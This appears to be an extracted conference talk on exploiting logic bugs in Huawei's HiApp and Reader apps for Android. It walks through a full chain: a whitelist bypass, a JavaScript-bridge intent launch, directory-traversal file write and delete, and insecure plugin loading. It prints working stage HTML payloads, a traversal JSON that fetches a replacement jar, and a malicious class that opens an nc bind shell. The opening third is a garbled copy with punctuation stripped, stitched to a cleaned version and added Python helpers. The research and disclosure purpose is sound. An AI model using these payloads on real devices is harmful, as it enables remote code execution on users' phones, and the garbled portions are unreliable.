thisaadd(vmallcom$)
thisaadd(huaweicom$)
Iterator v1 = comhuaweiappmarketservicewhitelistba()iterator()
do If(v1hasNext()) if(v1next()booleanValue()) continue
HiApp ndash stage1html (CVE-2018-7931)
32
documentlocation =hiappcomhuaweiappmarketactivityName=activityUri|webviewactivityampparams=params [ name uri type String value internal_webview name url type String value httpwwwvmallcom8000stage2html ] ampchannelId=1
Stage 1
Browse to Website on
Device
BROWSABLE Intent-
WebView
Code Exec and Profit
HiApp ndash JavaScript Bridge (CVE-2018-7932)
34
thiswebviewgetSettings()setJavaScriptEnabled(true)
thiswebviewrequestFocus()
thiswebviewsetWebViewClient(new InternalWebViewClient(this))
thiswebviewsetWebChromeClient(new
MarketWebChromeClient(this))
thiswebviewgetSettings()setBlockNetworkImage(true)
thiswebviewaddJavascriptInterface(new
HiSpaceObject(thismContext ((JsCallBackOjbect)this) thiswebview) HiSpaceObject)
HiApp ndash JavaScript Bridge (CVE-2018-7932)
35
JavascriptInterface public void launchApp(String arg7 String
arg8)
URISyntaxException v1_1
v0_1 = IntentparseUri(arg8 0)
try v0_1setPackage(arg7)
thismActivitystartActivity(v0_1)
android-app URI Schema
36
httpandroidxrefcom800_r4xrefframeworksbasecorejavaandroidco
ntentIntentjava
android-apppackage_id[scheme[host[path]]][Intent]
android-
appcomexampleappIntentaction=comexampleMY_ACTIONisome_int=
100Ssome_str=helloend
Action comexampleMY_ACTION
Package comexampleapp
Extras some_int=(int)100 some_str=(String)hello
HiApp ndash stage2html (CVE-2018-7932)
37
var pkg = comhuaweihwireader
var uri =
androidapphttpwwwgooglecoukIntentcomponent=comh
uaweihwireadercomzhangyueiReaderonlineuiActivityWeba
ction=comhuaweihwireaderSHOW_DETAILSurl=http192
16813718000stage3htmlend
windowHiSpaceObjectlaunchApp(pkguri)
Stage 2
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
Huawei Reader Application
39
Huawei Reader ndash Input Validation (CVE-2017-15308)
40
protected void onCreate(Bundle arg8)
CharSequence v0_1
String v0
CharSequence v1 = null
superonCreate(arg8)
Intent v2 = thisgetIntent()
if(v2 = null) Uri v3 = v2getData()
if(v3 = null) v0 = v3getScheme()
else v0_1 = v1
v0 = v2getStringExtra(url)
if(TextUtilsisEmpty(((CharSequence)v0))) goto label_51 thisloadRefreshUrl(v0)
Huawei Reader ndash Input Validation (CVE-2017-15308)
41
JavascriptInterface public void do_command(String arg9)
String v4 = ((JSONObject)v2_3)getString(Action)
LOGI(js actionName + v4)
JSONObject v5 =
((JSONObject)v2_3)getJSONObject(Data)
if(v4equalsIgnoreCase(onlineReader))
JSProtocolmJSBookProtocolonline(v5) return
if(v4equalsIgnoreCase(readNow))
JSProtocolmJSBookProtocolreadNow(v5) return
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
42
public void originalDownload(JSONObject arg19 boolean
arg20 boolean arg21)
v8 = 0
v10 = v4
v4_1 = 0
try
int v13 = v7getInt(Type)
v14 = v7optInt(Version)
v15 = v7optBoolean(getDrmAuth true)
v3 = PATHgetBookDir() + v7getString(FileName)
v2 = v7getInt(FileId)
v6 = v7getString(DownloadUrl)
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
43
function download_plugin()
var json =
ActiononlineReaderDataChargingFeeType0OrderUrlhttp192168137180
01aaaaaPrice0
DownloadInfoChapterId1FeeUnit10Type1FileId32532639FileNameplu
ginsDFServiceclassesjar
FileSize10000000Ebk3DownloadUrlhttpss3-ap-northeast
1amazonawscom4aaaaaa9q84q87reertw35wy5testzip
DownloadUrlhttpss3-ap-northeast-
1amazonawscomk4aaaaaaertw35wy5testzipVersion2
windowZhangYueJSdo_command(json)
Stage 3
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
File Write
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
45
public boolean onChapPack(JSONObject arg10)
boolean v0_2
try int v3 = arg10getInt(StartIndex)
int v4 = arg10getInt(EndIndex)
String v2 = arg10getString(Price)
int v1 = arg10getInt(BookId)
String v5 = arg10getString(PayURL)
String v0_1 = arg10getString(DownloadURL)
String v7 = PATHgetBookDir() + arg10getString(FileName)
if((FILEisExist(PATHgetBookNameCheckOpenFail(v7))) ampamp
DevicegetNetType() = 0xFFFFFFFF)
FILEdelete(PATHgetBookCachePathNamePostfix(v7))
FILEdelete(v7)
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
46
public static String getBookNameCheckOpenFail(String arg2)
return PATHgetOpenFailDir() + MD5getMD5(arg2)
public static String getOpenFailDir()
return PATHgetWorkDir() + booksopenfail
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
47
5457bea93d0548a4d84357308df45322 =
pluginsDFServiceclassesjar
sdcardHWiReaderbooksopenfail5457bea93d0548a4d8435
7308df45322
sdcardHWiReaderbookspluginsDFServiceclassesjar
Huawei Reader ndash Insecure Plugin Loading
48
public static Class loadPlug(Context arg4 String arg5 String arg6) throws Exception
return new DexClassLoader(arg5 arg4getApplicationInfo()dataDir null
arg4getClassLoader())loadClass(arg6)
protected final ArrayList P()
if(pR == null)
try PlatForm v3 = new PlatForm()
Object v2 = UtilloadPlug(APPgetAppContext() v3getPlugDir(DFService)
+
classesjar
comzhangyueiReaderPlugServiceDocFeature)newInstance()
v2setPlatform(((IPlatform)v3))
pR = ((IPlugDFService)v2)
Huawei Reader ndash Insecure Plugin Loading
49
function download_plugin()
documentwriteln(++ Downloading replacement classesjar ++)
It should be noted that FileId needs to be unique for the download to work correctly varjson = ActiononlineReaderDataChargingFeeType0OrderUrlhttp19216813718001aaaaaPrice0DownloadInfoChapterId1FeeUnit10Type1FileId + PLUGIN_FILE_ID + FileNamepluginsDFServiceclassesjarFileSize10000000Ebk3DownloadUrl + PLUGIN_URI + DownloadUrl + PLUGIN_URI + Version2
windowZhangYueJSdo_command(json)
Huawei Reader ndash Payload Creation
50
package comzhangyueiReaderPlugService
import androidutilLog
public class DocFeature
public DocFeature()
comzhangyueiReaderPlugServiceDocFeature
Loge(ATTACKERRUNNING ARBITRARY CODE)
String cmd = datadatacomhuaweihwireaderbusybox
nc -l -p 5555 -e datadatacomhuaweihwireaderbusybox sh
try
RuntimegetRuntime()exec(cmd)
catch (IOException e)
eprintStackTrace()
Demo
51
Questions
52
Credits
bull Georgi Geshev Rob Miller -
httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-
chrome-on-androidnew-blog-post
53
Whitepaper
54
bull Full whitepaper can be found on the MWR Labs website
(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)
PUBLIC
Exploit Mitigation Advancement
bull Memory Safety Mitigations
ndash ASLR PIE RELTO PartitionAlloc
bull Means you need mitigation bypass vulnerabilities too
bull Time consuming debugging memory corruption exploits on a real device
13
Attackers - Positives of Logic Bug Chains
bull Often design issues
ndash Hard to fix (long bug lives)
ndash Increased reliability
bull Architectural agnostic
ndash No problems with shellcode
bull Android IPC specifically is complex as hell
bull Harder to detect
14
Attackers - Negatives of Logic Bug Chains
bull They can get ridiculously long (11 Bugs in S8)
ndash One bug gets fixed and the whole chain is screwed
ndash Usually not particularly stealthy
Samsung phone rebooted
Huawei phone switches apps twice
bull Often requires a deeper understanding of the application
bull Automated detection is harder ndash how do you fuzz for logic bugs
15
Bug Hunting Tips
bull How too prioritise
ndash External Attack Surface (Reachable from browser)
ndash Permissions
Less of an issue for initial foothold
ndash Dangerous words
16
bull Want to rapidly find high risk issues in a large amount of apps
PUBLIC
Tooling and Automation
Toolset (Static vs Dynamic)
bull Android What do we care about
ndash BROWSABLE intents (Need to be web accessible) and Intents
ndash Content we can load into the applications (either via a WebView or Media)
ndash Controlled file writes reads
ndash Unsafe class loading
18
Increasing the attack surface
How do we get more things accessible
bull Intent Proxy Bugs
bull MITM stuff (SSL weaknesses)
19
Intent Proxy Example
bull Android Vendingbull LaunchUrlHandlerActivity
bull We control the package name and URIfinal Intent a(Intent arg17 b arg18 j arg19)
Intent v2_1Uri v7 = arg17getData()String v8 = v7getQueryParameter(url)String v10 = v7getQueryParameter(id)
hellipif((v5) ampamp (v12))
v2_1 = new Intent(androidintentactionVIEW)v2_1setData(Uriparse(v8))v2_1setPackage(v10)return v2_1
hellip
Toolset (Static Analysis)
• Rezord (internal) – mass de-compilation of all apps
• JEB
• Grep

'Jandroid' – Static analysis
• For more info see the "Chainspotting: Building Exploit Chains with Logic Bugs" slides:
  https://infiltratecon.com/archives/[Infiltrate]%20Geshev%20and%20Miller%20-%20Logic%20Bug%20Hunting%20in%20Chrome%20on%20Android.pdf
Dynamic Analysis Toolset
Xposed and Frida compared on: global hook, flexible, requires root, lightweight
• Xposed
  – Early injection (Zygote)
  – Global hooks across multiple applications
• Frida
  – Quick and easy prototyping
  – Debugging and dynamic analysis of obfuscated code
Vulnerabilities

Building an Exploit Chain
• So what do we need to do?
• Assuming no memory corruption
• BROWSABLE Intent / URI handler etc.

Browse to website on device → Code exec and profit

HiApp – Huawei Market Place (App Gallery)
HiApp – Whitelist Bypass (CVE-2018-7931)

    <activity android:configChanges="orientation|screenSize"
              android:launchMode="singleTop"
              android:name="com.huawei.appmarket.service.externalapi.view.ThirdApiActivity"
              android:theme="@style/loading_activity_style">
        <intent-filter>
            <action android:name="android.intent.action.VIEW" />
            <category android:name="android.intent.category.DEFAULT" />
            <category android:name="android.intent.category.BROWSABLE" />
            <data android:host="details" android:scheme="appmarket" />
            <data android:host="search" android:scheme="market" />
            <data android:host="a.vmall.com" android:scheme="https" />
            <data android:host="com.huawei.appmarket" android:scheme="hiapp" />
        </intent-filter>
    </activity>
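The two triage passes from the tooling section (web-reachable BROWSABLE activities in the manifest, and "dangerous words" in decompiled source) as a small script. This is an added example, not code from the talk or from MWR's Rezord / Jandroid tooling: SAMPLE_MANIFEST is constructed from the ThirdApiActivity entry above plus two made-up activities, SAMPLE_JAVA is constructed from the decompiled snippets on the page, and the DANGEROUS_WORDS table is this example's own selection.

```python
"""Triage helpers: BROWSABLE activities from AndroidManifest.xml, dangerous words in Java.

Added example, not code from the talk or from MWR's Rezord / Jandroid tooling.
SAMPLE_MANIFEST is constructed from the HiApp ThirdApiActivity entry on the page
plus two made-up activities; SAMPLE_JAVA is constructed from the decompiled
snippets on the page; DANGEROUS_WORDS is this example's own selection.
"""
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"

SAMPLE_MANIFEST = """<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.huawei.appmarket">
  <application>
    <activity android:name="com.huawei.appmarket.service.externalapi.view.ThirdApiActivity"
              android:launchMode="singleTop">
      <intent-filter>
        <action android:name="android.intent.action.VIEW" />
        <category android:name="android.intent.category.DEFAULT" />
        <category android:name="android.intent.category.BROWSABLE" />
        <data android:host="details" android:scheme="appmarket" />
        <data android:host="search" android:scheme="market" />
        <data android:host="a.vmall.com" android:scheme="https" />
        <data android:host="com.huawei.appmarket" android:scheme="hiapp" />
      </intent-filter>
    </activity>
    <activity android:name="com.example.Internal" android:exported="false">
      <intent-filter>
        <action android:name="android.intent.action.VIEW" />
        <category android:name="android.intent.category.BROWSABLE" />
        <data android:scheme="internal" />
      </intent-filter>
    </activity>
    <activity android:name="com.example.Plain" />
  </application>
</manifest>
"""

SAMPLE_JAVA = """\
this.webview.getSettings().setJavaScriptEnabled(true);
this.webview.addJavascriptInterface(new HiSpaceObject(this.mContext, this, this.webview), "HiSpaceObject");
Intent v0_1 = Intent.parseUri(arg8, 0);
v0 = v2.getStringExtra("url");
return new DexClassLoader(arg5, arg4.getApplicationInfo().dataDir, null, arg4.getClassLoader()).loadClass(arg6);
"""

# word -> why it matters for a browser-to-code-exec chain (this example's own list)
DANGEROUS_WORDS = {
    "addJavascriptInterface": "Java methods exposed to whatever the WebView loads",
    "setJavaScriptEnabled(true)": "WebView runs script",
    "Intent.parseUri": "intent built from an attacker-supplied string",
    'getStringExtra("url")': "URL taken from the incoming intent",
    "DexClassLoader": "code loaded from a path at runtime",
}


def _attr(elem, name):
    return elem.get("{%s}%s" % (ANDROID_NS, name))


def browsable_activities(manifest_xml):
    """Return [(activity, [scheme://host, ...])] for activities a browser can launch.

    An activity counts as exported when android:exported="true" or when the attribute
    is unset and the activity declares an intent-filter (the pre-Android-12 default);
    it is web reachable when a filter carries both ACTION_VIEW and CATEGORY_BROWSABLE.
    """
    root = ET.fromstring(manifest_xml)
    found = []
    for act in root.iter("activity"):
        exported = _attr(act, "exported")
        filters = act.findall("intent-filter")
        if exported == "false" or (exported is None and not filters):
            continue
        patterns = []
        for f in filters:
            actions = {_attr(e, "name") for e in f.findall("action")}
            cats = {_attr(e, "name") for e in f.findall("category")}
            if "android.intent.action.VIEW" not in actions:
                continue
            if "android.intent.category.BROWSABLE" not in cats:
                continue
            for d in f.findall("data"):
                patterns.append("%s://%s" % (_attr(d, "scheme") or "*", _attr(d, "host") or ""))
        if patterns:
            found.append((_attr(act, "name"), patterns))
    return found


def dangerous_calls(java_source):
    """Return [(line_no, word, why)] for each dangerous word found in decompiled source."""
    hits = []
    for n, line in enumerate(java_source.splitlines(), 1):
        for word, why in DANGEROUS_WORDS.items():
            if word in line:
                hits.append((n, word, why))
    return hits


if __name__ == "__main__":
    for name, patterns in browsable_activities(SAMPLE_MANIFEST):
        print(name)
        for p in patterns:
            print("    " + p)
    for n, word, why in dangerous_calls(SAMPLE_JAVA):
        print("line %d: %s  (%s)" % (n, word, why))
```

Run against a whole decompiled corpus, the first function gives the list of entry points a web page can hit; the second gives the lines worth reading first in each of them.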
HiApp – Whitelist Bypass (CVE-2018-7931)

    public List b() {
        if(b.a(this.a)) {
            this.a = new ArrayList();
            this.a.clear();
            this.a.add("hicloud.com$");
            this.a.add("vmall.com$");
            this.a.add("huawei.com$");
            Iterator v1 = com.huawei.appmarket.service.whitelist.b.a().iterator();
            do {
                if(v1.hasNext()) {
                    if(v1.next().booleanValue()) {
                        continue;
                    }
                    …

The whitelist is a set of host-suffix regexes; a URL whose host matches one of them is accepted for the internal WebView.
HiApp – stage1.html (CVE-2018-7931)

    document.location = "hiapp://com.huawei.appmarket?activityName=activityUri|webview.activity"
        + "&params={\"params\":[{\"name\":\"uri\",\"type\":\"String\",\"value\":\"internal_webview\"},"
        + "{\"name\":\"url\",\"type\":\"String\",\"value\":\"http://www.vmall.com:8000/stage2.html\"}]}"
        + "&channelId=1";

The hiapp:// BROWSABLE scheme lets a web page open the internal WebView on a URL whose host passes the whitelist.

Stage 1: Browse to website on device → BROWSABLE Intent → WebView → Code exec and profit
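The whitelist shape from b() beside the stricter check a reviewer would ask for. Added example, not code from the talk or the app: the three patterns are the ones listed on the page, but loose_allowed() is an assumed reading of how the app applies them (a regex search over the URL host), and which property of the real check the chain abused is not detailed on the page. STAGE1_URL is the URL stage1.html hands to the WebView and is used only as the input that reaches it.

```python
"""Host allow-list: the suffix-regex shape from the decompiled b() beside a stricter check.

Added example, not code from the talk or the app. WHITELIST_PATTERNS are the
patterns listed on the page; loose_allowed() is an assumed reading of how they
are applied; strict_allowed() is the hardened alternative.
"""
import re
from urllib.parse import urlsplit

WHITELIST_PATTERNS = ["hicloud.com$", "vmall.com$", "huawei.com$"]   # as added in b()
ALLOWED_HOSTS = ("hicloud.com", "vmall.com", "huawei.com")

STAGE1_URL = "http://www.vmall.com:8000/stage2.html"   # from stage1.html on the page


def loose_allowed(url):
    """Assumed app behaviour: any pattern that matches somewhere in the host accepts the URL."""
    host = urlsplit(url).hostname or ""
    return any(re.search(p, host) is not None for p in WHITELIST_PATTERNS)


def strict_allowed(url):
    """Bind the check to https, the default port and an exact or dot-delimited host suffix.

    A host-only regex says nothing about transport: it accepts plain http to a
    whitelisted host, which is all a network-position attacker needs to serve the page.
    """
    parts = urlsplit(url)
    if parts.scheme != "https" or parts.port is not None or not parts.hostname:
        return False
    host = parts.hostname.lower()
    return any(host == h or host.endswith("." + h) for h in ALLOWED_HOSTS)


def compare(url):
    """Both verdicts side by side, for a quick table."""
    return {"loose": loose_allowed(url), "strict": strict_allowed(url)}


if __name__ == "__main__":
    for u in (STAGE1_URL, "https://a.vmall.com/", "https://vmall.com.attacker.example/"):
        print(u, compare(u))
```

The stage-1 URL passes the loose check and fails the strict one on two counts (scheme and explicit port); a look-alike host with the allowed name as a prefix is rejected by both because of the `$` anchor, so the anchoring is not the weak part of this list.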
HiApp – JavaScript Bridge (CVE-2018-7932)

    this.webview.getSettings().setJavaScriptEnabled(true);
    this.webview.requestFocus();
    this.webview.setWebViewClient(new InternalWebViewClient(this));
    this.webview.setWebChromeClient(new MarketWebChromeClient(this));
    this.webview.getSettings().setBlockNetworkImage(true);
    this.webview.addJavascriptInterface(
        new HiSpaceObject(this.mContext, ((JsCallBackOjbect)this), this.webview), "HiSpaceObject");
HiApp – JavaScript Bridge (CVE-2018-7932)

    @JavascriptInterface
    public void launchApp(String arg7, String arg8) {
        URISyntaxException v1_1;
        v0_1 = Intent.parseUri(arg8, 0);
        try {
            v0_1.setPackage(arg7);
            this.mActivity.startActivity(v0_1);

Both the package (arg7) and the intent URI (arg8) come from page script, so whatever is loaded in the internal WebView can start any activity it can name, with arbitrary extras.
android-app URI Schema

http://androidxref.com/8.0.0_r4/xref/frameworks/base/core/java/android/content/Intent.java

    android-app://{package_id}[/{scheme}[/{host}[/{path}]]][#Intent;{...};end]

    android-app://com.example.app/#Intent;action=com.example.MY_ACTION;i.some_int=100;S.some_str=hello;end

    Action:  com.example.MY_ACTION
    Package: com.example.app
    Extras:  some_int=(int)100, some_str=(String)"hello"
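How Intent.parseUri() takes a string like the one above apart, and what launchApp() then does with it. This is an added example: a simplified Python re-implementation of the parsing rules in Intent.java, not the framework's code and not from the talk. It covers the pieces the HiApp bridge relies on (package authority, action, component, typed extras, the intent: data prefix) and leaves out selectors, launchFlags sanitising and the base64 / Bundle extra types; the test inputs are the page's example and a cleaned-up form of its stage-2 URI.

```python
"""Decode the android-app:// and #Intent;...;end URI forms that Intent.parseUri() accepts.

Added example: a simplified Python re-implementation of the rules in Intent.java,
not the framework's code and not from the talk.
"""
from urllib.parse import unquote

ACTION_VIEW = "android.intent.action.VIEW"
ACTION_MAIN = "android.intent.action.MAIN"

# extra-type prefixes Intent.parseUri() understands; an untyped extra is a URISyntaxException
_EXTRA_TYPES = {
    "S": str,
    "B": lambda v: v.lower() == "true",
    "b": int,
    "c": lambda v: v[0],
    "d": float,
    "f": float,
    "i": int,
    "l": int,
    "s": int,
}


class IntentUriError(ValueError):
    """Stands in for java.net.URISyntaxException."""


def parse_intent_uri(uri):
    """Return the intent as a dict: action, package, component, categories, data, extras."""
    intent = {"action": ACTION_VIEW, "package": None, "component": None,
              "categories": [], "data": None, "extras": {}, "scheme": None}
    android_app = uri.startswith("android-app://")
    frag = uri.rfind("#")
    has_fragment = frag != -1 and uri.startswith("#Intent;", frag)
    if not has_fragment and not android_app:
        intent["data"] = uri            # plain URL: ACTION_VIEW on the data
        return intent
    head = uri[:frag] if has_fragment else uri
    explicit_action = False
    if has_fragment:
        body = uri[frag + len("#Intent;"):]
        if not body.endswith("end"):
            raise IntentUriError("missing ;end")
        for item in body[:-len("end")].split(";"):
            if not item:
                continue
            key, _, value = item.partition("=")
            value = unquote(value)
            if key == "action":
                intent["action"] = value
                explicit_action = True
            elif key == "category":
                intent["categories"].append(value)
            elif key in ("package", "component", "scheme", "type", "launchFlags", "sourceBounds"):
                intent[key] = value
            elif len(key) > 2 and key[1] == "." and key[0] in _EXTRA_TYPES:
                intent["extras"][unquote(key[2:])] = _EXTRA_TYPES[key[0]](value)
            else:
                raise IntentUriError("unknown EXTRA type: " + key)
    if android_app:
        # android-app://{package_id}[/{scheme}[/{host}[/{path}]]]
        parts = head[len("android-app://"):].split("/")
        intent["package"] = parts[0]
        if len(parts) > 1 and parts[1]:
            intent["data"] = parts[1] + ":" + ("//" + "/".join(parts[2:]) if len(parts) > 2 else "")
        elif not explicit_action:
            intent["action"] = ACTION_MAIN   # package only: launch its main activity
    elif head.startswith("intent:"):
        data = head[len("intent:"):]
        intent["data"] = (intent["scheme"] + ":" + data) if intent["scheme"] else data
    elif head:
        intent["data"] = head
    return intent


def launch_app(pkg, uri):
    """What HiSpaceObject.launchApp() does: parseUri(uri, 0), setPackage(pkg), startActivity().

    The caller picks the target component and every extra; pkg only replaces the package.
    """
    intent = parse_intent_uri(uri)
    intent["package"] = pkg
    return intent
```

The S. prefix matters: the Reader activity reads its target with getStringExtra("url"), and parseUri() only stores an extra it can type, so a string extra has to be written as S.url=... for the bridge call to succeed.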
HiApp – stage2.html (CVE-2018-7932)

    var pkg = "com.huawei.hwireader";
    var uri = "android-app://http://www.google.co.uk/#Intent;"
        + "component=com.huawei.hwireader/com.zhangyue.iReader.online.ui.ActivityWeb;"
        + "action=com.huawei.hwireader.SHOW_DETAILS;"
        + "S.url=http://192.168.137.1:8000/stage3.html;end";
    window.HiSpaceObject.launchApp(pkg, uri);

Stage 2: Browse to website on device → BROWSABLE Intent → WebView → Exported Intent → WebView → Code exec and profit
Huawei Reader Application

Huawei Reader – Input Validation (CVE-2017-15308)

    protected void onCreate(Bundle arg8) {
        CharSequence v0_1;
        String v0;
        CharSequence v1 = null;
        super.onCreate(arg8);
        Intent v2 = this.getIntent();
        if(v2 != null) {
            Uri v3 = v2.getData();
            if(v3 != null) {
                v0 = v3.getScheme();
            }
            else {
                v0_1 = v1;
            }
            v0 = v2.getStringExtra("url");
            if(TextUtils.isEmpty(((CharSequence)v0))) {
                goto label_51;
            }
            this.loadRefreshUrl(v0);

The exported ActivityWeb loads whatever the "url" extra of the incoming intent names, so any app (or, through the HiApp bridge, any web page) can point its WebView at attacker content.
Huawei Reader – Input Validation (CVE-2017-15308)

    @JavascriptInterface
    public void do_command(String arg9) {
        …
        String v4 = ((JSONObject)v2_3).getString("Action");
        LOG.I("js actionName " + v4);
        JSONObject v5 = ((JSONObject)v2_3).getJSONObject("Data");
        if(v4.equalsIgnoreCase("onlineReader")) {
            JSProtocol.mJSBookProtocol.online(v5);
            return;
        }
        if(v4.equalsIgnoreCase("readNow")) {
            JSProtocol.mJSBookProtocol.readNow(v5);
            return;
        }

That WebView exposes a second bridge, ZhangYueJS.do_command(), which dispatches on the "Action" field of attacker-supplied JSON; the onlineReader branch leads to the download code below.
Huawei Reader – Arbitrary Write / Directory Traversal (CVE-2017-15309)

    public void originalDownload(JSONObject arg19, boolean arg20, boolean arg21) {
        …
        v8 = 0;
        v10 = v4;
        v4_1 = 0;
        try {
            int v13 = v7.getInt("Type");
            v14 = v7.optInt("Version");
            v15 = v7.optBoolean("getDrmAuth", true);
            v3 = PATH.getBookDir() + v7.getString("FileName");
            v2 = v7.getInt("FileId");
            v6 = v7.getString("DownloadUrl");

The destination is PATH.getBookDir() + FileName with FileName taken straight from the JSON, so "../" sequences walk out of the books directory, and DownloadUrl says where the content to write there is fetched from.
Huawei Reader – Arbitrary Write / Directory Traversal (CVE-2017-15309)

    function download_plugin() {
        var json = '{"Action":"onlineReader",'
            + '"Data":{"Charging":{"FeeType":0,"OrderUrl":"http://192.168.137.1:8001/aaaaa","Price":0},'
            + '"DownloadInfo":{"ChapterId":1,"FeeUnit":10,"Type":1,"FileId":32532639,'
            + '"FileName":"../plugins/DFService/classes.jar","FileSize":10000000,'
            + '"Ebk3DownloadUrl":"https://s3-ap-northeast-1.amazonaws.com/4aaaaaa9q84q87reertw35wy5/test.zip",'
            + '"DownloadUrl":"https://s3-ap-northeast-1.amazonaws.com/k4aaaaaaertw35wy5/test.zip",'
            + '"Version":2}}}';
        window.ZhangYueJS.do_command(json);
    }

Stage 3: Browse to website on device → BROWSABLE Intent → WebView → Exported Intent → WebView → File write → Code exec and profit
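The path handling behind CVE-2017-15309 and the delete in CVE-2017-15310, worked through on the download_plugin() payload: where the FileName lands after concatenation, the containment check the app lacks, and the openfail marker name onChapPack() looks for. This is an added example, not the app's code or the talk's. BOOK_DIR and the payload mirror the paths and JSON shown on the page; PLUGIN_DIR is an assumed location for getPlugDir("DFService"); openfail_marker() follows getBookNameCheckOpenFail() (openfail dir plus the MD5 of the unnormalised path).

```python
"""PATH.getBookDir() + FileName with no validation, beside the containment check that is missing.

Added example, not the app's code or the talk's. BOOK_DIR and PAYLOAD mirror the
page; PLUGIN_DIR is an assumed location for getPlugDir("DFService").
"""
import hashlib
import json
import posixpath

BOOK_DIR = "/sdcard/HWiReader/books/"                  # PATH.getBookDir()
OPENFAIL_DIR = BOOK_DIR + "openfail/"                  # PATH.getOpenFailDir()
PLUGIN_DIR = "/sdcard/HWiReader/plugins/DFService/"    # assumed getPlugDir("DFService")

# constructed from the download_plugin() payload on the page
PAYLOAD = json.dumps({
    "Action": "onlineReader",
    "Data": {
        "Charging": {"FeeType": 0, "OrderUrl": "http://192.168.137.1:8001/aaaaa", "Price": 0},
        "DownloadInfo": {
            "ChapterId": 1, "FeeUnit": 10, "Type": 1, "FileId": 32532639,
            "FileName": "../plugins/DFService/classes.jar", "FileSize": 10000000,
            "DownloadUrl": "https://s3-ap-northeast-1.amazonaws.com/k4aaaaaaertw35wy5/test.zip",
            "Version": 2,
        },
    },
})


def app_target(file_name):
    """What originalDownload() does: plain concatenation, traversal included."""
    return BOOK_DIR + file_name


def safe_target(file_name):
    """Normalise, then refuse anything that does not stay under BOOK_DIR."""
    resolved = posixpath.normpath(posixpath.join(BOOK_DIR, file_name))
    base = BOOK_DIR.rstrip("/")
    if resolved != base and not resolved.startswith(base + "/"):
        raise ValueError("FileName escapes the book directory: " + resolved)
    return resolved


def openfail_marker(raw_path):
    """Marker onChapPack() requires before it deletes raw_path: openfail/ + MD5(raw_path)."""
    return OPENFAIL_DIR + hashlib.md5(raw_path.encode()).hexdigest()


def analyse(payload_json):
    """Where a payload's FileName lands and what the delete step would need."""
    info = json.loads(payload_json)["Data"]["DownloadInfo"]
    raw = app_target(info["FileName"])
    resolved = posixpath.normpath(raw)
    return {
        "raw": raw,
        "resolved": resolved,
        "escapes_book_dir": not resolved.startswith(BOOK_DIR),
        "hits_plugin_jar": resolved == PLUGIN_DIR + "classes.jar",
        "openfail_marker": openfail_marker(raw),
    }


if __name__ == "__main__":
    for k, v in analyse(PAYLOAD).items():
        print("%-18s %s" % (k, v))
```

The same concatenation appears in onChapPack(), so the delete is traversable in exactly the same way; the marker name returned here is the file the arbitrary write has to create first so that FILE.isExist() passes.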
Huawei Reader – Arbitrary Delete (CVE-2017-15310)

    public boolean onChapPack(JSONObject arg10) {
        boolean v0_2;
        try {
            int v3 = arg10.getInt("StartIndex");
            int v4 = arg10.getInt("EndIndex");
            String v2 = arg10.getString("Price");
            int v1 = arg10.getInt("BookId");
            String v5 = arg10.getString("PayURL");
            String v0_1 = arg10.getString("DownloadURL");
            String v7 = PATH.getBookDir() + arg10.getString("FileName");
            if((FILE.isExist(PATH.getBookNameCheckOpenFail(v7))) && DEVICE.getNetType() != 0xFFFFFFFF) {
                FILE.delete(PATH.getBookCachePathNamePostfix(v7));
                FILE.delete(v7);

    public static String getBookNameCheckOpenFail(String arg2) {
        return PATH.getOpenFailDir() + MD5.getMD5(arg2);
    }

    public static String getOpenFailDir() {
        return PATH.getWorkDir() + "books/openfail/";
    }

FileName is again concatenated onto the book directory without validation, so the delete is traversable too. It only fires when a marker file named after the MD5 of the target path exists under books/openfail/ (and the device reports a network type); the arbitrary write from CVE-2017-15309 can create that marker, after which the plugin jar is deleted:

    5457bea93d0548a4d84357308df45322  = MD5 of the classes.jar target path (plugins/DFService/classes.jar)
    /sdcard/HWiReader/books/openfail/5457bea93d0548a4d84357308df45322   (marker written first)
    /sdcard/HWiReader/books/../plugins/DFService/classes.jar            (then deleted)
Huawei Reader – Insecure Plugin Loading

    public static Class loadPlug(Context arg4, String arg5, String arg6) throws Exception {
        return new DexClassLoader(arg5, arg4.getApplicationInfo().dataDir, null,
                arg4.getClassLoader()).loadClass(arg6);
    }

    protected final ArrayList P() {
        if(pR == null) {
            try {
                PlatForm v3 = new PlatForm();
                Object v2 = Util.loadPlug(APP.getAppContext(),
                        v3.getPlugDir("DFService") + "classes.jar",
                        "com.zhangyue.iReader.PlugService.DocFeature").newInstance();
                v2.setPlatform(((IPlatform)v3));
                pR = ((IPlugDFService)v2);

The plugin jar is loaded with DexClassLoader from the same external-storage tree the traversal writes into, with no signature or hash check in the code shown, so a replacement classes.jar runs inside the reader's process.

Huawei Reader – Insecure Plugin Loading

    function download_plugin() {
        document.writeln("++ Downloading replacement classes.jar ++");
        // FileId needs to be unique for the download to work correctly
        var json = '{"Action":"onlineReader",'
            + '"Data":{"Charging":{"FeeType":0,"OrderUrl":"http://192.168.137.1:8001/aaaaa","Price":0},'
            + '"DownloadInfo":{"ChapterId":1,"FeeUnit":10,"Type":1,"FileId":' + PLUGIN_FILE_ID + ','
            + '"FileName":"../plugins/DFService/classes.jar","FileSize":10000000,'
            + '"Ebk3DownloadUrl":"' + PLUGIN_URI + '","DownloadUrl":"' + PLUGIN_URI + '","Version":2}}}';
        window.ZhangYueJS.do_command(json);
    }
Huawei Reader – Payload Creation

    package com.zhangyue.iReader.PlugService;

    import android.util.Log;
    import java.io.IOException;

    public class DocFeature {
        // runs as soon as loadPlug(...).newInstance() instantiates the replacement class
        public DocFeature() {
            Log.e("ATTACKER", "RUNNING ARBITRARY CODE");
            String cmd = "/data/data/com.huawei.hwireader/busybox nc -l -p 5555 -e /data/data/com.huawei.hwireader/busybox sh";
            try {
                Runtime.getRuntime().exec(cmd);
            } catch (IOException e) {
                e.printStackTrace();
            }
        }
    }
Demo

Questions

Credits
